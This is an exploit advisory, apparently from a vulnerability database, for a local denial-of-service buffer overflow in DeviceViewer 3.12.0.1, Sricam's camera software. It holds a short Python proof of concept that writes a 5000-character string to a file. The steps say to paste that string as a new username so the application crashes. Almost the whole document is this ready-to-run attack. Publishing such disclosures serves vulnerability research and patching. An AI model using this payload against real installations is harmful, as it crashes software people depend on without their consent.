DeviceViewer 3.12.0.1 Denial Of Service

2019.09.25
Credit: x00pwn
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/python
# Exploit Title: DeviceViewer 3.12.0.1 - 'creating user' DOS buffer overflow
# Date: 9/23/2019
# Exploit Author: x00pwn
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Tested on: Windows 7

# Steps to reproduce:
# 1. Generate a malicious payload via the POC
# 2. In the Sricam application create a new user
# 3. When creating a new user, set the username as the malicious payload
# 4. Observe a program DOS crash

# 5000 "A" characters, used as the oversized username
payload = "A" * 5000

try:
    # Write the payload to exploit.txt so it can be pasted into the username field
    evilCreate = open("exploit.txt", "w")
    print("""
    DeviceViewer 3.12.0.1 DOS exploit POC
    Author: Nu11pwn
    """)
    print("[x] Creating malicious file")
    evilCreate.write(payload)
    evilCreate.close()
    print("[x] Malicious file created")
    print("[x] When creating a new user, set the username to the file contents")
    print("[x] Watch the program crash")
except IOError:
    # Raised when the file cannot be opened or written
    print("[!] File failed to be created")



Copyright 2024, cxsecurity.com
